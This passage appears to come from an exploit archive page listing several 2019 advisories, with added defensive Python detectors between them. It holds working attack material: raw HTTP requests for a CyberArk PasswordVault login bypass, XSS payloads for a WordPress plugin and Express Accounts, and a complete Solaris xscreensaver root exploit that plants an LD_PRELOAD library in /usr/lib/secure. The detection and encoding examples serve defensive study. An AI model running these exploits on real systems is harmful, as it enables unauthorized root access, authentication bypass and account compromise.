ame=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd=


# User Information:

POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 28
{"userName":"administrator"}


# Resolve DNS / DoS

GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CAAjax: adon90
Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
Connection: close
Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
Upgrade-Insecure-Requests: 1
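The advisory's bypass hinges on a single control character (%1F) in the username field. The root cause is not stated on the page, so the following added example (not part of the advisory) stays on the detection and input-validation side: it decodes a login body the way the application would, reports any Unicode control characters in the username as a WAF or authentication-log rule should, and gives the hardened acceptance test for a username. The field name is the one from the advisory; both request bodies are constructed samples.

```python
"""Spot control characters in login usernames (added example, not from the advisory)."""
import unicodedata
from urllib.parse import parse_qs

# Form field named in the advisory (URL-decoded form of the parameter).
USERNAME_FIELD = "pvBody:PageTemplate:innerHolder:ctrlLogon:txtUsername"

# Constructed request bodies: the advisory's %1F payload and an ordinary login.
BAD_BODY = ("__EVENTTARGET=&__EVENTARGUMENT="
            "&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F"
            "&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword="
            "&AuthModuleUsed=radius")
OK_BODY = ("pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=jdoe"
           "&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=x"
           "&AuthModuleUsed=radius")


def login_username(body):
    """Username exactly as the application receives it after form decoding."""
    return parse_qs(body, keep_blank_values=True).get(USERNAME_FIELD, [""])[0]


def control_chars(s):
    """Code points of Unicode category Cc (C0/C1 controls, U+001F among them)."""
    return ["U+%04X" % ord(c) for c in s if unicodedata.category(c) == "Cc"]


def flag_login(body):
    """Detection view: what a WAF or auth-log rule should record for a login attempt."""
    user = login_username(body)
    ctl = control_chars(user)
    return {"username": repr(user), "control_chars": ctl,
            "suspicious": bool(ctl) or user.strip() == ""}


def is_acceptable_username(user):
    """Hardened input rule: non-empty, printable only, no leading/trailing whitespace."""
    return bool(user) and user.isprintable() and user.strip() == user


if __name__ == "__main__":
    print(flag_login(BAD_BODY))
    print(flag_login(OK_BODY))
```

Rejecting control characters at the edge does not replace a vendor fix, but it both blocks the published payload shape and turns each attempt into a logged event with the exact code point, which is what an incident responder wants to see.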

Tomedo Server 1.7.3 Information Disclosure / Weak Cryptography


Tomedo Server version 1.7.3 suffers from weak password cryptography and cleartext transmission of sensitive information vulnerabilities.


MD5 | 07f8e3571fab4054ca321d2f70a6bd2c

Affected software: Tomedo Server 1.7.3
Vulnerability type: Cleartext Transmission of Sensitive Information & Weak Cryptography for Passwords
Vulnerable version: Tomedo Server 1.7.3
Vulnerable component: Customer Tomedo Server that communicates with the Vendor Tomedo Update Server
Vendor report confidence: Confirmed
Fixed version: Versions later than 1.7.3
Vendor notification: 20/09/19
Solution date: 25/09/19
CVE reference: CVE-2019-17393
CVSS Score: 3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Credits: Chris Hein, ProSec GmbH
Communication Timeline:
20th September 2019: Initial contact, no response
25th September: Second contact attempt
28th September: Vendor responded and released an update
14th October: Full disclosure

Vulnerability Details:
The customer's Tomedo Server version 1.7.3 communicates with the vendor's Tomedo update server over plain HTTP, so the traffic can be sniffed by unauthorized actors on the network path.
HTTP Basic authentication is used, so the sniffed Authorization header only needs to be base64-decoded to recover the username and password.

Proof of concept:
Capture the traffic between the Tomedo servers via a proxy or a MITM attack and base64-decode the credentials from the HTTP GET request.
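The finding above is the classic pairing of plain HTTP with Basic authentication. As an added example (not from the advisory, and not Tomedo's protocol), here is the detection logic a network sensor or proxy log rule would apply to a captured request: it parses the request, checks whether Basic credentials are travelling without TLS, and reports the username and only the length of the password, so the alert itself does not become another cleartext copy of the secret. A second helper is the configuration-side check that the update endpoint is an https URL. The request and the credentials in it are constructed.

```python
"""Detect HTTP Basic credentials sent in cleartext (added example, not from the advisory)."""
import base64
from urllib.parse import urlsplit

# Constructed capture, not Tomedo traffic: a version check sent over plain HTTP
# with a Basic header carrying 'praxis:hunter2' (made-up credentials).
SAMPLE_REQUEST = (
    "GET /update/check?product=tomedo&version=1.7.3 HTTP/1.1\r\n"
    "Host: update.example.invalid\r\n"
    "Authorization: Basic cHJheGlzOmh1bnRlcjI=\r\n"
    "User-Agent: TomedoServer/1.7.3\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw request into (method, target, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def basic_auth_exposure(raw, transport_tls=False):
    """Finding for a request carrying Basic credentials over a non-TLS transport, else None.

    Only the username and the password length are reported, so the alert can be
    logged without copying the secret into yet another cleartext store."""
    method, target, headers = parse_request(raw)
    auth = headers.get("authorization", "")
    if transport_tls or not auth.lower().startswith("basic "):
        return None
    try:
        token = auth.split(None, 1)[1]
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (ValueError, IndexError):
        return None  # malformed header, not a usable Basic credential
    user, _, password = decoded.partition(":")
    return {"method": method, "host": headers.get("host", ""), "target": target,
            "username": user, "password_length": len(password)}


def update_url_is_cleartext(url):
    """Configuration check: the update endpoint must be https, not http."""
    return urlsplit(url).scheme.lower() == "http"


if __name__ == "__main__":
    print(basic_auth_exposure(SAMPLE_REQUEST))
    print(update_url_is_cleartext("http://update.example.invalid/update/check"))
```

The transport_tls flag is passed in by the caller because the request bytes alone do not say whether they were captured inside a TLS session; a proxy or sensor knows that from the connection, not from the headers.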


Mikogo 5.2.2.150317 Mikogo-Service Unquoted Service Path


Mikogo version 5.2.2.150317 suffers from a Mikogo-Service unquoted service path vulnerability.


MD5 | de8b28e0f5ac6ad4e7e9250e3f9ca9b1

# Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support
# Tested on Windows 10
# CVE : N/A


c:\>sc qc Mikogo-Service
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Mikogo-Service
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Mikogo-Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

WordPress Broken Link Checker 1.11.8 Cross Site Scripting


WordPress Broken Link Checker plugin version 1.11.8 suffers from a cross site scripting vulnerability.


MD5 | f4e5f99e5386047d6bb5b0fef5bf7606

Document Title
===============
Reflected XSS via `Broken Link Checker` v.1.11.8 WordPress plugin.

Product Description
===============
Broken Link Checker will monitor your blog looking for broken links and let
you know if any are found.

Homepage: https://managewp.com/
WordPress Plugin: https://wordpress.org/plugins/broken-link-checker/

PoC
===============

1) Log in to your WordPress site.
2) Navigate to the following page (make sure the `s_link_text` parameter
returns a valid link on your blog):

http://localhost:8889/wp-admin/tools.php?page=view-broken-links&filter_id=search&s_link_text=word&s_link_url&s_http_code&s_filter=%27%3E%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E&s_link_type&search_button=Search+Links

3) Note that the form alerts: the payload in the `s_filter` parameter
was executed.


CVE-2019-17207



Solaris 11.4 xscreensaver Privilege Escalation


Solaris version 11.4 xscreensaver local privilege escalation exploit.


MD5 | 8d51762f9d56e5990e3285d970927af8

# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation
# Date: 2019-10-16
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/
# Version: Solaris 11.x
# Tested on: Solaris 11.4 and 11.3 X86
# CVE: N/A

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Exploitation of a design error vulnerability in xscreensaver, as
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation SunOS 5.11 11.4 Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the payload
echo "int getuid(){return 0;}"> /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -
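Two things in the script above give a defender something concrete to look for: an xscreensaver process started with -log pointing into a runtime-linker trusted directory, and the umask 0 that leaves the created log file world-writable. The following is an added example, not part of the exploit or of Oracle's tooling: it classifies -log targets from process records and flags world-writable files in /usr/lib/secure. The trusted directory list is the ld.so.1 one for Solaris (/lib/secure, /usr/lib/secure and their 64 subdirectories); the audit records and the ls -l listing are constructed samples.

```python
"""Detection for abuse of xscreensaver's -log switch (added example, not from the exploit)."""
import posixpath
import shlex

# Solaris runtime-linker trusted directories (ld.so.1): a library planted here is
# honoured by LD_PRELOAD for privileged programs, which is what the exploit relies on.
TRUSTED_LIB_DIRS = ("/lib/secure", "/lib/secure/64", "/usr/lib/secure", "/usr/lib/secure/64")

# Constructed process records (uid, home directory, command line); not real audit output.
AUDIT_RECORDS = [
    'uid=1000 home=/home/alice cmd="/usr/bin/xscreensaver -display :0 -log /home/alice/xss.log"',
    'uid=1000 home=/home/alice cmd="/usr/bin/xscreensaver -display :1 -log /usr/lib/secure/64/getuid.so"',
    'uid=1001 home=/home/bob cmd="/usr/bin/xscreensaver -display :1 -log /etc/motd"',
    'uid=1000 home=/home/alice cmd="/usr/bin/xscreensaver-command -activate"',
]

# Constructed 'ls -l' listing of the 64-bit trusted directory after the exploit ran:
# the script sets umask 0, so the log file it creates ends up world-writable.
LS_LINES = [
    "-rwxr-xr-x   1 root  bin    40000 Aug 20  2018 /usr/lib/secure/64/placeholder.so",
    "-rw-rw-rw-   1 root  root   16384 Oct 16 12:00 /usr/lib/secure/64/getuid.so",
]


def xscreensaver_log_target(cmdline):
    """Path given to -log when the command is xscreensaver itself, else None."""
    argv = shlex.split(cmdline)
    if not argv or posixpath.basename(argv[0]) != "xscreensaver":
        return None
    for i, arg in enumerate(argv[:-1]):
        if arg == "-log":
            return argv[i + 1]
    return None


def classify_log_path(path, home):
    path = posixpath.normpath(path)
    if any(path == d or path.startswith(d + "/") for d in TRUSTED_LIB_DIRS):
        return "critical"      # log file lands in a runtime-linker trusted directory
    if path.startswith(home.rstrip("/") + "/") or path.startswith("/tmp/"):
        return "ok"            # a location the invoking user may write anyway
    return "suspicious"        # anywhere else is not where a screensaver log belongs


def scan_audit(records):
    """(uid, log path, verdict) for every xscreensaver invocation that used -log."""
    findings = []
    for rec in records:
        fields = dict(item.split("=", 1) for item in shlex.split(rec))
        target = xscreensaver_log_target(fields.get("cmd", ""))
        if target is not None:
            verdict = classify_log_path(target, fields.get("home", "/nonexistent"))
            findings.append((fields.get("uid"), target, verdict))
    return findings


def world_writable(ls_lines):
    """Paths from an 'ls -l' listing whose mode grants write to 'other'."""
    hits = []
    for line in ls_lines:
        parts = line.split()
        if len(parts) >= 2 and len(parts[0]) >= 10 and parts[0][8] == "w":
            hits.append(parts[-1])
    return hits


if __name__ == "__main__":
    for finding in scan_audit(AUDIT_RECORDS):
        print(finding)
    print("world-writable in trusted dir:", world_writable(LS_LINES))
```

The "ok" class is intentionally narrow (the user's own home and /tmp); a -log target anywhere else is worth a ticket even when it is not one of the trusted directories, because the file is created with the privileges xscreensaver runs with, not the caller's.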

LiteManager 4.5.0 romservice Unquoted Service Path


LiteManager version 4.5.0 suffers from a romservice unquoted service path vulnerability.


MD5 | 0900a3ce6f8c29d8e6247ccbcb39f51f

# Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: LiteManager Team
# Version : LiteManager 4.5.0
# Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on Windows 10
# CVE : N/A

c:\>sc qc romservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: romservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : LiteManagerTeam LiteManager
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
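Both the Mikogo post and the LiteManager post above rest on the same sc qc output. The following is an added example, not code from either post: a checker that parses that output, applies the precondition the classic unquoted-path weakness actually needs (no surrounding quotes and at least one space inside the image path), lists the directories whose write ACLs an administrator must audit, and produces the quoted binPath that fixes it. Run over the two listings it flags the LiteManager path but not the Mikogo one, whose path contains no spaces. The listings are trimmed copies from the posts; the Spanish label is the one printed in the localized listing at the top of this page.

```python
"""Check Windows services for unquoted image paths (added example, not from the posts)."""
import ntpath
import re

# Constructed samples: the 'sc qc' listings from the two posts above, trimmed.
SC_QC_ROMSERVICE = r"""SERVICE_NAME: romservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe
SERVICE_START_NAME : LocalSystem
"""
SC_QC_MIKOGO = r"""SERVICE_NAME: Mikogo-Service
TYPE : 110 WIN32_OWN_PROCESS (interactive)
BINARY_PATH_NAME : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe
"""

# English label, plus the Spanish one a localized Windows prints.
PATH_KEYS = ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO")


def parse_binary_path(sc_qc_output):
    for line in sc_qc_output.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() in PATH_KEYS:
            return value.strip()
    return None


def split_image(path):
    """(image, arguments): the executable up to and including '.exe', and whatever follows."""
    m = re.match(r"(.*?\.exe)(.*)$", path, re.IGNORECASE | re.DOTALL)
    return (m.group(1), m.group(2)) if m else (path, "")


def is_unquoted_with_spaces(path):
    """True for the vulnerable shape: no surrounding quotes and a space inside the image path."""
    if not path or path.startswith('"'):
        return False
    image, _ = split_image(path)
    return " " in image


def directories_to_audit(path):
    """Directories whose ACLs decide whether the truncated names Windows tries first
    could be created by a non-administrator; one entry per space, de-duplicated."""
    image, _ = split_image(path)
    dirs = []
    for i, ch in enumerate(image):
        if ch == " ":
            d = ntpath.dirname(image[:i])
            if d not in dirs:
                dirs.append(d)
    return dirs


def quoted_path(path):
    """The fix: quote the image path (the value to give 'sc config <svc> binPath=')."""
    image, args = split_image(path)
    return '"%s"%s' % (image, args)


def assess(sc_qc_output):
    path = parse_binary_path(sc_qc_output)
    vulnerable = is_unquoted_with_spaces(path)
    return {"path": path, "unquoted_with_spaces": vulnerable,
            "audit_dirs": directories_to_audit(path) if vulnerable else [],
            "fixed_binpath": quoted_path(path) if vulnerable else path}


if __name__ == "__main__":
    print(assess(SC_QC_ROMSERVICE))
    print(assess(SC_QC_MIKOGO))
```

A service whose path has no spaces is not exposed to this particular weakness even if unquoted, so the checker's negative result for Mikogo-Service is the caveat worth carrying into a report; a path under a user profile has its own ACL questions, but they are a different finding.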

Express Accounts Accounting 7.02 Cross Site Scripting

Express Accounts Accounting version 7.02 suffers from a persistent cross site scripting vulnerability.


MD5 | 8d14427d751f0863044b80dbeb9e6753

# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-16
# Vendor Homepage: https://www.nchsoftware.com
# Source: https://www.nchsoftware.com/accounting/index.html
# Version: Express Accounts Accounting v7.02
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)

# About Express Accounts Accounting v7.02
=========================================
Express Accounts is professional business accounting software, perfect for small businesses.

# Vulnerability
================
Persistent Cross site scripting (XSS).

# PoC
======

1. Log in as an authenticated unprivileged user to the Express Accounts Accounting v7.02 web-enabled service, i.e. http://A.B.C.D:98 [default installation].
2. Under "Invoices": Invoices List -> View Invoices -> Add New Invoice -> in the Customer field enter </script><script>alert('XSS');</script>
Save the change.

or

Under "Sales Orders": Sales Orders -> View Orders -> Add New Order -> New Sales Order -> in the Customer field enter </script><script>alert('XSS');</script>
Save the change.

or

Under "Items": Items -> Add New Item -> in the Item field enter </script><script>alert('XSS');</script>
Save the change.

or

Under "Customers": Customers -> Add New Customer -> in the Customer Name field enter </script><script>alert('XSS');</script>
Save the change.

or

Under "Quotes": Quotes -> View Quotes -> Add New Quote -> in the Customer field enter </script><script>alert('XSS');</script>
Save the change.

3. Log in as any authenticated user (privileged or unprivileged) to the Express Accounts v7.02 web-enabled service and visit any of the Invoices/Sales Orders/Items/Customers/Quotes sections; the persistent XSS payload will execute.
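The Broken Link Checker post earlier on this page and the Express Accounts steps above show the two usual XSS sinks: a reflected parameter landing in an HTML attribute, and a stored field landing inside an inline script. As an added example (not code from either product, whose real templates are not on this page), the block below takes the exact payloads from the two posts, renders each through an assumed vulnerable sink and through the context-appropriate encoder, and measures whether the payload still breaks out. The two sink templates are assumptions made for the demonstration.

```python
"""Output encoding for the two XSS sinks exercised on this page (added example)."""
import html
import json
from urllib.parse import parse_qs, urlsplit

# Constructed inputs: the PoC URL from the Broken Link Checker post and the
# customer-name payload from the Express Accounts post.
WP_POC_URL = ("http://localhost:8889/wp-admin/tools.php?page=view-broken-links&filter_id=search"
              "&s_link_text=word&s_link_url&s_http_code"
              "&s_filter=%27%3E%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E"
              "&s_link_type&search_button=Search+Links")
STORED_CUSTOMER = "</script><script>alert('XSS');</script>"


def reflected_param(url, name):
    """Value of a query parameter as the server sees it after URL decoding."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def render_filter_unsafe(value):
    # Assumed sink: the search filter is echoed into a single-quoted attribute verbatim.
    return "<input name='s_filter' value='%s'>" % value


def render_filter_safe(value):
    # Attribute context: HTML-encode the significant characters (& < > " ').
    return "<input name='s_filter' value='%s'>" % html.escape(value, quote=True)


def render_customer_unsafe(customer):
    # Assumed sink: the stored name is interpolated into an inline script string.
    return "<script>var customer = '%s';</script>" % customer


def render_customer_safe(customer):
    # Script context: JSON-encode, then neutralise '</' so a literal '</script>'
    # inside the string cannot terminate the script block early.
    encoded = json.dumps(customer).replace("</", "<\\/")
    return "<script>var customer = %s;</script>" % encoded


def demo():
    v = reflected_param(WP_POC_URL, "s_filter")
    return {
        "decoded_filter": v,
        "filter_unsafe_injects_img": "<img" in render_filter_unsafe(v),
        "filter_safe_injects_img": "<img" in render_filter_safe(v),
        "customer_unsafe_script_tags": render_customer_unsafe(STORED_CUSTOMER).count("</script>"),
        "customer_safe_script_tags": render_customer_safe(STORED_CUSTOMER).count("</script>"),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, "=", val)
```

The point of the two encoders is that they are not interchangeable: html.escape inside a script string would still let the browser's HTML parser end the block at the first literal </script>, and JSON encoding inside an attribute would leave the quote characters live.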

# Disclosure Timeline
======================
Vulnerability Discover Date: 15-Sep-2019.
Vulnerability notification to vendor via vendor-provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no response.
Submit exploit-db : 16-Oct-2019.


# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
